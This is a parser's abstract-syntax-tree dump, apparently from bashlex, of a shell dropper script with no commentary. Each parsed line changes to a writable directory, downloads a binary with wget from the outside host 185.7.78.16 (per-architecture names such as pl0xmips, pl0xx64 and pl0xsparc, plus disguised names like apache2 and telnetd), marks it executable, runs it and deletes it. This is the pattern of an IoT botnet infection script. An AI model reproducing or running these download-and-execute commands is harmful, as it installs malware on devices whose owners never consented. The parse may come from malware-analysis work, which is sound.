ListNode(lineno=2, pos=(12, 147), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 99), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 99), word='http://185.7.78.16/pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(99, 100)),
  CommandNode(lineno=2, pos=(101, 118), parts=[
    WordNode(lineno=2, pos=(101, 106), word='chmod'),
    WordNode(lineno=2, pos=(107, 109), word='+x'),
    WordNode(lineno=2, pos=(110, 118), word='pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 130), parts=[
    WordNode(lineno=2, pos=(120, 130), word='./pl0xmips'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(130, 131)),
  CommandNode(lineno=2, pos=(132, 147), parts=[
    WordNode(lineno=2, pos=(132, 134), word='rm'),
    WordNode(lineno=2, pos=(135, 138), word='-rf'),
    WordNode(lineno=2, pos=(139, 147), word='pl0xmips'),
  ]),
])
ListNode(lineno=3, pos=(148, 291), parts=[
  CommandNode(lineno=3, pos=(148, 155), parts=[
    WordNode(lineno=3, pos=(148, 150), word='cd'),
    WordNode(lineno=3, pos=(151, 155), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(156, 158)),
  CommandNode(lineno=3, pos=(159, 170), parts=[
    WordNode(lineno=3, pos=(159, 161), word='cd'),
    WordNode(lineno=3, pos=(162, 170), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(171, 173)),
  CommandNode(lineno=3, pos=(174, 181), parts=[
    WordNode(lineno=3, pos=(174, 176), word='cd'),
    WordNode(lineno=3, pos=(177, 181), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(182, 184)),
  CommandNode(lineno=3, pos=(185, 193), parts=[
    WordNode(lineno=3, pos=(185, 187), word='cd'),
    WordNode(lineno=3, pos=(188, 193), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(194, 196)),
  CommandNode(lineno=3, pos=(197, 201), parts=[
    WordNode(lineno=3, pos=(197, 199), word='cd'),
    WordNode(lineno=3, pos=(200, 201), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(201, 202)),
  CommandNode(lineno=3, pos=(203, 237), parts=[
    WordNode(lineno=3, pos=(203, 207), word='wget'),
    WordNode(lineno=3, pos=(208, 237), word='http://185.7.78.16/pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(237, 238)),
  CommandNode(lineno=3, pos=(239, 258), parts=[
    WordNode(lineno=3, pos=(239, 244), word='chmod'),
    WordNode(lineno=3, pos=(245, 247), word='+x'),
    WordNode(lineno=3, pos=(248, 258), word='pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(258, 259)),
  CommandNode(lineno=3, pos=(260, 272), parts=[
    WordNode(lineno=3, pos=(260, 272), word='./pl0xmipsel'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(272, 273)),
  CommandNode(lineno=3, pos=(274, 291), parts=[
    WordNode(lineno=3, pos=(274, 276), word='rm'),
    WordNode(lineno=3, pos=(277, 280), word='-rf'),
    WordNode(lineno=3, pos=(281, 291), word='pl0xmipsel'),
  ]),
])
ListNode(lineno=4, pos=(292, 423), parts=[
  CommandNode(lineno=4, pos=(292, 299), parts=[
    WordNode(lineno=4, pos=(292, 294), word='cd'),
    WordNode(lineno=4, pos=(295, 299), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(300, 302)),
  CommandNode(lineno=4, pos=(303, 314), parts=[
    WordNode(lineno=4, pos=(303, 305), word='cd'),
    WordNode(lineno=4, pos=(306, 314), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(315, 317)),
  CommandNode(lineno=4, pos=(318, 325), parts=[
    WordNode(lineno=4, pos=(318, 320), word='cd'),
    WordNode(lineno=4, pos=(321, 325), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(326, 328)),
  CommandNode(lineno=4, pos=(329, 337), parts=[
    WordNode(lineno=4, pos=(329, 331), word='cd'),
    WordNode(lineno=4, pos=(332, 337), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(338, 340)),
  CommandNode(lineno=4, pos=(341, 345), parts=[
    WordNode(lineno=4, pos=(341, 343), word='cd'),
    WordNode(lineno=4, pos=(344, 345), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(345, 346)),
  CommandNode(lineno=4, pos=(347, 378), parts=[
    WordNode(lineno=4, pos=(347, 351), word='wget'),
    WordNode(lineno=4, pos=(352, 378), word='http://185.7.78.16/pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(378, 379)),
  CommandNode(lineno=4, pos=(380, 396), parts=[
    WordNode(lineno=4, pos=(380, 385), word='chmod'),
    WordNode(lineno=4, pos=(386, 388), word='+x'),
    WordNode(lineno=4, pos=(389, 396), word='pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(396, 397)),
  CommandNode(lineno=4, pos=(398, 407), parts=[
    WordNode(lineno=4, pos=(398, 407), word='./pl0xsh4'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(407, 408)),
  CommandNode(lineno=4, pos=(409, 423), parts=[
    WordNode(lineno=4, pos=(409, 411), word='rm'),
    WordNode(lineno=4, pos=(412, 415), word='-rf'),
    WordNode(lineno=4, pos=(416, 423), word='pl0xsh4'),
  ]),
])
ListNode(lineno=5, pos=(424, 555), parts=[
  CommandNode(lineno=5, pos=(424, 431), parts=[
    WordNode(lineno=5, pos=(424, 426), word='cd'),
    WordNode(lineno=5, pos=(427, 431), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(432, 434)),
  CommandNode(lineno=5, pos=(435, 446), parts=[
    WordNode(lineno=5, pos=(435, 437), word='cd'),
    WordNode(lineno=5, pos=(438, 446), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(447, 449)),
  CommandNode(lineno=5, pos=(450, 457), parts=[
    WordNode(lineno=5, pos=(450, 452), word='cd'),
    WordNode(lineno=5, pos=(453, 457), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(458, 460)),
  CommandNode(lineno=5, pos=(461, 469), parts=[
    WordNode(lineno=5, pos=(461, 463), word='cd'),
    WordNode(lineno=5, pos=(464, 469), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(470, 472)),
  CommandNode(lineno=5, pos=(473, 477), parts=[
    WordNode(lineno=5, pos=(473, 475), word='cd'),
    WordNode(lineno=5, pos=(476, 477), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(477, 478)),
  CommandNode(lineno=5, pos=(479, 510), parts=[
    WordNode(lineno=5, pos=(479, 483), word='wget'),
    WordNode(lineno=5, pos=(484, 510), word='http://185.7.78.16/pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(510, 511)),
  CommandNode(lineno=5, pos=(512, 528), parts=[
    WordNode(lineno=5, pos=(512, 517), word='chmod'),
    WordNode(lineno=5, pos=(518, 520), word='+x'),
    WordNode(lineno=5, pos=(521, 528), word='pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(528, 529)),
  CommandNode(lineno=5, pos=(530, 539), parts=[
    WordNode(lineno=5, pos=(530, 539), word='./pl0xx64'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(539, 540)),
  CommandNode(lineno=5, pos=(541, 555), parts=[
    WordNode(lineno=5, pos=(541, 543), word='rm'),
    WordNode(lineno=5, pos=(544, 547), word='-rf'),
    WordNode(lineno=5, pos=(548, 555), word='pl0xx64'),
  ]),
])
ListNode(lineno=6, pos=(556, 707), parts=[
  CommandNode(lineno=6, pos=(556, 563), parts=[
    WordNode(lineno=6, pos=(556, 558), word='cd'),
    WordNode(lineno=6, pos=(559, 563), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(564, 566)),
  CommandNode(lineno=6, pos=(567, 578), parts=[
    WordNode(lineno=6, pos=(567, 569), word='cd'),
    WordNode(lineno=6, pos=(570, 578), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(579, 581)),
  CommandNode(lineno=6, pos=(582, 589), parts=[
    WordNode(lineno=6, pos=(582, 584), word='cd'),
    WordNode(lineno=6, pos=(585, 589), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(590, 592)),
  CommandNode(lineno=6, pos=(593, 601), parts=[
    WordNode(lineno=6, pos=(593, 595), word='cd'),
    WordNode(lineno=6, pos=(596, 601), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(602, 604)),
  CommandNode(lineno=6, pos=(605, 609), parts=[
    WordNode(lineno=6, pos=(605, 607), word='cd'),
    WordNode(lineno=6, pos=(608, 609), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(609, 610)),
  CommandNode(lineno=6, pos=(611, 647), parts=[
    WordNode(lineno=6, pos=(611, 615), word='wget'),
    WordNode(lineno=6, pos=(616, 647), word='http://185.7.78.16/marikophones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(647, 648)),
  CommandNode(lineno=6, pos=(649, 670), parts=[
    WordNode(lineno=6, pos=(649, 654), word='chmod'),
    WordNode(lineno=6, pos=(655, 657), word='+x'),
    WordNode(lineno=6, pos=(658, 670), word='marikophones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(670, 671)),
  CommandNode(lineno=6, pos=(672, 686), parts=[
    WordNode(lineno=6, pos=(672, 686), word='./marikophones'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(686, 687)),
  CommandNode(lineno=6, pos=(688, 707), parts=[
    WordNode(lineno=6, pos=(688, 690), word='rm'),
    WordNode(lineno=6, pos=(691, 694), word='-rf'),
    WordNode(lineno=6, pos=(695, 707), word='marikophones'),
  ]),
])
ListNode(lineno=7, pos=(708, 843), parts=[
  CommandNode(lineno=7, pos=(708, 715), parts=[
    WordNode(lineno=7, pos=(708, 710), word='cd'),
    WordNode(lineno=7, pos=(711, 715), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(716, 718)),
  CommandNode(lineno=7, pos=(719, 730), parts=[
    WordNode(lineno=7, pos=(719, 721), word='cd'),
    WordNode(lineno=7, pos=(722, 730), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(731, 733)),
  CommandNode(lineno=7, pos=(734, 741), parts=[
    WordNode(lineno=7, pos=(734, 736), word='cd'),
    WordNode(lineno=7, pos=(737, 741), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(742, 744)),
  CommandNode(lineno=7, pos=(745, 753), parts=[
    WordNode(lineno=7, pos=(745, 747), word='cd'),
    WordNode(lineno=7, pos=(748, 753), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(754, 756)),
  CommandNode(lineno=7, pos=(757, 761), parts=[
    WordNode(lineno=7, pos=(757, 759), word='cd'),
    WordNode(lineno=7, pos=(760, 761), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(761, 762)),
  CommandNode(lineno=7, pos=(763, 795), parts=[
    WordNode(lineno=7, pos=(763, 767), word='wget'),
    WordNode(lineno=7, pos=(768, 795), word='http://185.7.78.16/pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(795, 796)),
  CommandNode(lineno=7, pos=(797, 814), parts=[
    WordNode(lineno=7, pos=(797, 802), word='chmod'),
    WordNode(lineno=7, pos=(803, 805), word='+x'),
    WordNode(lineno=7, pos=(806, 814), word='pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(814, 815)),
  CommandNode(lineno=7, pos=(816, 826), parts=[
    WordNode(lineno=7, pos=(816, 826), word='./pl0xi686'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(826, 827)),
  CommandNode(lineno=7, pos=(828, 843), parts=[
    WordNode(lineno=7, pos=(828, 830), word='rm'),
    WordNode(lineno=7, pos=(831, 834), word='-rf'),
    WordNode(lineno=7, pos=(835, 843), word='pl0xi686'),
  ]),
])
ListNode(lineno=8, pos=(844, 975), parts=[
  CommandNode(lineno=8, pos=(844, 851), parts=[
    WordNode(lineno=8, pos=(844, 846), word='cd'),
    WordNode(lineno=8, pos=(847, 851), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(852, 854)),
  CommandNode(lineno=8, pos=(855, 866), parts=[
    WordNode(lineno=8, pos=(855, 857), word='cd'),
    WordNode(lineno=8, pos=(858, 866), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(867, 869)),
  CommandNode(lineno=8, pos=(870, 877), parts=[
    WordNode(lineno=8, pos=(870, 872), word='cd'),
    WordNode(lineno=8, pos=(873, 877), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(878, 880)),
  CommandNode(lineno=8, pos=(881, 889), parts=[
    WordNode(lineno=8, pos=(881, 883), word='cd'),
    WordNode(lineno=8, pos=(884, 889), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(890, 892)),
  CommandNode(lineno=8, pos=(893, 897), parts=[
    WordNode(lineno=8, pos=(893, 895), word='cd'),
    WordNode(lineno=8, pos=(896, 897), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(897, 898)),
  CommandNode(lineno=8, pos=(899, 930), parts=[
    WordNode(lineno=8, pos=(899, 903), word='wget'),
    WordNode(lineno=8, pos=(904, 930), word='http://185.7.78.16/pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(930, 931)),
  CommandNode(lineno=8, pos=(932, 948), parts=[
    WordNode(lineno=8, pos=(932, 937), word='chmod'),
    WordNode(lineno=8, pos=(938, 940), word='+x'),
    WordNode(lineno=8, pos=(941, 948), word='pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(948, 949)),
  CommandNode(lineno=8, pos=(950, 959), parts=[
    WordNode(lineno=8, pos=(950, 959), word='./pl0xppc'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(959, 960)),
  CommandNode(lineno=8, pos=(961, 975), parts=[
    WordNode(lineno=8, pos=(961, 963), word='rm'),
    WordNode(lineno=8, pos=(964, 967), word='-rf'),
    WordNode(lineno=8, pos=(968, 975), word='pl0xppc'),
  ]),
])
ListNode(lineno=9, pos=(976, 1091), parts=[
  CommandNode(lineno=9, pos=(976, 983), parts=[
    WordNode(lineno=9, pos=(976, 978), word='cd'),
    WordNode(lineno=9, pos=(979, 983), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(984, 986)),
  CommandNode(lineno=9, pos=(987, 998), parts=[
    WordNode(lineno=9, pos=(987, 989), word='cd'),
    WordNode(lineno=9, pos=(990, 998), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(999, 1001)),
  CommandNode(lineno=9, pos=(1002, 1009), parts=[
    WordNode(lineno=9, pos=(1002, 1004), word='cd'),
    WordNode(lineno=9, pos=(1005, 1009), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1010, 1012)),
  CommandNode(lineno=9, pos=(1013, 1021), parts=[
    WordNode(lineno=9, pos=(1013, 1015), word='cd'),
    WordNode(lineno=9, pos=(1016, 1021), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(1022, 1024)),
  CommandNode(lineno=9, pos=(1025, 1029), parts=[
    WordNode(lineno=9, pos=(1025, 1027), word='cd'),
    WordNode(lineno=9, pos=(1028, 1029), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1029, 1030)),
  CommandNode(lineno=9, pos=(1031, 1058), parts=[
    WordNode(lineno=9, pos=(1031, 1035), word='wget'),
    WordNode(lineno=9, pos=(1036, 1058), word='http://185.7.78.16/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1058, 1059)),
  CommandNode(lineno=9, pos=(1060, 1072), parts=[
    WordNode(lineno=9, pos=(1060, 1065), word='chmod'),
    WordNode(lineno=9, pos=(1066, 1068), word='+x'),
    WordNode(lineno=9, pos=(1069, 1072), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1072, 1073)),
  CommandNode(lineno=9, pos=(1074, 1079), parts=[
    WordNode(lineno=9, pos=(1074, 1079), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1079, 1080)),
  CommandNode(lineno=9, pos=(1081, 1091), parts=[
    WordNode(lineno=9, pos=(1081, 1083), word='rm'),
    WordNode(lineno=9, pos=(1084, 1087), word='-rf'),
    WordNode(lineno=9, pos=(1088, 1091), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1092, 1211), parts=[
  CommandNode(lineno=10, pos=(1092, 1099), parts=[
    WordNode(lineno=10, pos=(1092, 1094), word='cd'),
    WordNode(lineno=10, pos=(1095, 1099), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1100, 1102)),
  CommandNode(lineno=10, pos=(1103, 1114), parts=[
    WordNode(lineno=10, pos=(1103, 1105), word='cd'),
    WordNode(lineno=10, pos=(1106, 1114), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1115, 1117)),
  CommandNode(lineno=10, pos=(1118, 1125), parts=[
    WordNode(lineno=10, pos=(1118, 1120), word='cd'),
    WordNode(lineno=10, pos=(1121, 1125), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1126, 1128)),
  CommandNode(lineno=10, pos=(1129, 1137), parts=[
    WordNode(lineno=10, pos=(1129, 1131), word='cd'),
    WordNode(lineno=10, pos=(1132, 1137), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1138, 1140)),
  CommandNode(lineno=10, pos=(1141, 1145), parts=[
    WordNode(lineno=10, pos=(1141, 1143), word='cd'),
    WordNode(lineno=10, pos=(1144, 1145), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1145, 1146)),
  CommandNode(lineno=10, pos=(1147, 1175), parts=[
    WordNode(lineno=10, pos=(1147, 1151), word='wget'),
    WordNode(lineno=10, pos=(1152, 1175), word='http://185.7.78.16/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1175, 1176)),
  CommandNode(lineno=10, pos=(1177, 1190), parts=[
    WordNode(lineno=10, pos=(1177, 1182), word='chmod'),
    WordNode(lineno=10, pos=(1183, 1185), word='+x'),
    WordNode(lineno=10, pos=(1186, 1190), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1190, 1191)),
  CommandNode(lineno=10, pos=(1192, 1198), parts=[
    WordNode(lineno=10, pos=(1192, 1198), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1198, 1199)),
  CommandNode(lineno=10, pos=(1200, 1211), parts=[
    WordNode(lineno=10, pos=(1200, 1202), word='rm'),
    WordNode(lineno=10, pos=(1203, 1206), word='-rf'),
    WordNode(lineno=10, pos=(1207, 1211), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1212, 1351), parts=[
  CommandNode(lineno=11, pos=(1212, 1219), parts=[
    WordNode(lineno=11, pos=(1212, 1214), word='cd'),
    WordNode(lineno=11, pos=(1215, 1219), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1220, 1222)),
  CommandNode(lineno=11, pos=(1223, 1234), parts=[
    WordNode(lineno=11, pos=(1223, 1225), word='cd'),
    WordNode(lineno=11, pos=(1226, 1234), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1235, 1237)),
  CommandNode(lineno=11, pos=(1238, 1245), parts=[
    WordNode(lineno=11, pos=(1238, 1240), word='cd'),
    WordNode(lineno=11, pos=(1241, 1245), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1246, 1248)),
  CommandNode(lineno=11, pos=(1249, 1257), parts=[
    WordNode(lineno=11, pos=(1249, 1251), word='cd'),
    WordNode(lineno=11, pos=(1252, 1257), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1258, 1260)),
  CommandNode(lineno=11, pos=(1261, 1265), parts=[
    WordNode(lineno=11, pos=(1261, 1263), word='cd'),
    WordNode(lineno=11, pos=(1264, 1265), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1265, 1266)),
  CommandNode(lineno=11, pos=(1267, 1300), parts=[
    WordNode(lineno=11, pos=(1267, 1271), word='wget'),
    WordNode(lineno=11, pos=(1272, 1300), word='http://185.7.78.16/pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1300, 1301)),
  CommandNode(lineno=11, pos=(1302, 1320), parts=[
    WordNode(lineno=11, pos=(1302, 1307), word='chmod'),
    WordNode(lineno=11, pos=(1308, 1310), word='+x'),
    WordNode(lineno=11, pos=(1311, 1320), word='pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1320, 1321)),
  CommandNode(lineno=11, pos=(1322, 1333), parts=[
    WordNode(lineno=11, pos=(1322, 1333), word='./pl0xsparc'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1333, 1334)),
  CommandNode(lineno=11, pos=(1335, 1351), parts=[
    WordNode(lineno=11, pos=(1335, 1337), word='rm'),
    WordNode(lineno=11, pos=(1338, 1341), word='-rf'),
    WordNode(lineno=11, pos=(1342, 1351), word='pl0xsparc'),
  ]),
])
ListNode(lineno=12, pos=(1352, 1467), parts=[
  CommandNode(lineno=12, pos=(1352, 1359), parts=[
    WordNode(lineno=12, pos=(1352, 1354), word='cd'),
    WordNode(lineno=12, pos=(1355, 1359), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1360, 1362)),
  CommandNode(lineno=12, pos=(1363, 1374), parts=[
    WordNode(lineno=12, pos=(1363, 1365), word='cd'),
    WordNode(lineno=12, pos=(1366, 1374), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1375, 1377)),
  CommandNode(lineno=12, pos=(1378, 1385), parts=[
    WordNode(lineno=12, pos=(1378, 1380), word='cd'),
    WordNode(lineno=12, pos=(1381, 1385), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1386, 1388)),
  CommandNode(lineno=12, pos=(1389, 1397), parts=[
    WordNode(lineno=12, pos=(1389, 1391), word='cd'),
    WordNode(lineno=12, pos=(1392, 1397), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1398, 1400)),
  CommandNode(lineno=12, pos=(1401, 1405), parts=[
    WordNode(lineno=12, pos=(1401, 1403), word='cd'),
    WordNode(lineno=12, pos=(1404, 1405), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1405, 1406)),
  CommandNode(lineno=12, pos=(1407, 1434), parts=[
    WordNode(lineno=12, pos=(1407, 1411), word='wget'),
    WordNode(lineno=12, pos=(1412, 1434), word='http://185.7.78.16/ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1434, 1435)),
  CommandNode(lineno=12, pos=(1436, 1448), parts=[
    WordNode(lineno=12, pos=(1436, 1441), word='chmod'),
    WordNode(lineno=12, pos=(1442, 1444), word='+x'),
    WordNode(lineno=12, pos=(1445, 1448), word=' '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1448, 1449)),
  CommandNode(lineno=12, pos=(1450, 1455), parts=[
    WordNode(lineno=12, pos=(1450, 1455), word='./ '),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1455, 1456)),
  CommandNode(lineno=12, pos=(1457, 1467), parts=[
    WordNode(lineno=12, pos=(1457, 1459), word='rm'),
    WordNode(lineno=12, pos=(1460, 1463), word='-rf'),
    WordNode(lineno=12, pos=(1464, 1467), word=' '),
  ]),
])
ListNode(lineno=13, pos=(1468, 1599), parts=[
  CommandNode(lineno=13, pos=(1468, 1475), parts=[
    WordNode(lineno=13, pos=(1468, 1470), word='cd'),
    WordNode(lineno=13, pos=(1471, 1475), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1476, 1478)),
  CommandNode(lineno=13, pos=(1479, 1490), parts=[
    WordNode(lineno=13, pos=(1479, 1481), word='cd'),
    WordNode(lineno=13, pos=(1482, 1490), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1491, 1493)),
  CommandNode(lineno=13, pos=(1494, 1501), parts=[
    WordNode(lineno=13, pos=(1494, 1496), word='cd'),
    WordNode(lineno=13, pos=(1497, 1501), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1502, 1504)),
  CommandNode(lineno=13, pos=(1505, 1513), parts=[
    WordNode(lineno=13, pos=(1505, 1507), word='cd'),
    WordNode(lineno=13, pos=(1508, 1513), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1514, 1516)),
  CommandNode(lineno=13, pos=(1517, 1521), parts=[
    WordNode(lineno=13, pos=(1517, 1519), word='cd'),
    WordNode(lineno=13, pos=(1520, 1521), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1521, 1522)),
  CommandNode(lineno=13, pos=(1523, 1554), parts=[
    WordNode(lineno=13, pos=(1523, 1527), word='wget'),
    WordNode(lineno=13, pos=(1528, 1554), word='http://185.7.78.16/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1554, 1555)),
  CommandNode(lineno=13, pos=(1556, 1572), parts=[
    WordNode(lineno=13, pos=(1556, 1561), word='chmod'),
    WordNode(lineno=13, pos=(1562, 1564), word='+x'),
    WordNode(lineno=13, pos=(1565, 1572), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1572, 1573)),
  CommandNode(lineno=13, pos=(1574, 1583), parts=[
    WordNode(lineno=13, pos=(1574, 1583), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1583, 1584)),
  CommandNode(lineno=13, pos=(1585, 1599), parts=[
    WordNode(lineno=13, pos=(1585, 1587), word='rm'),
    WordNode(lineno=13, pos=(1588, 1591), word='-rf'),
    WordNode(lineno=13, pos=(1592, 1599), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1600, 1731), parts=[
  CommandNode(lineno=14, pos=(1600, 1607), parts=[
    WordNode(lineno=14, pos=(1600, 1602), word='cd'),
    WordNode(lineno=14, pos=(1603, 1607), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1608, 1610)),
  CommandNode(lineno=14, pos=(1611, 1622), parts=[
    WordNode(lineno=14, pos=(1611, 1613), word='cd'),
    WordNode(lineno=14, pos=(1614, 1622), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1623, 1625)),
  CommandNode(lineno=14, pos=(1626, 1633), parts=[
    WordNode(lineno=14, pos=(1626, 1628), word='cd'),
    WordNode(lineno=14, pos=(1629, 1633), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1634, 1636)),
  CommandNode(lineno=14, pos=(1637, 1645), parts=[
    WordNode(lineno=14, pos=(1637, 1639), word='cd'),
    WordNode(lineno=14, pos=(1640, 1645), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1646, 1648)),
  CommandNode(lineno=14, pos=(1649, 1653), parts=[
    WordNode(lineno=14, pos=(1649, 1651), word='cd'),
    WordNode(lineno=14, pos=(1652, 1653), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1653, 1654)),
  CommandNode(lineno=14, pos=(1655, 1686), parts=[
    WordNode(lineno=14, pos=(1655, 1659), word='wget'),
    WordNode(lineno=14, pos=(1660, 1686), word='http://185.7.78.16/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1686, 1687)),
  CommandNode(lineno=14, pos=(1688, 1704), parts=[
    WordNode(lineno=14, pos=(1688, 1693), word='chmod'),
    WordNode(lineno=14, pos=(1694, 1696), word='+x'),
    WordNode(lineno=14, pos=(1697, 1704), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1704, 1705)),
  CommandNode(lineno=14, pos=(1706, 1715), parts=[
    WordNode(lineno=14, pos=(1706, 1715), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1715, 1716)),
  CommandNode(lineno=14, pos=(1717, 1731), parts=[
    WordNode(lineno=14, pos=(1717, 1719), word='rm'),
    WordNode(lineno=14, pos=(1720, 1723), word='-rf'),
    WordNode(lineno=14, pos=(1724, 1731), word='telnetd'),
  ]),
])
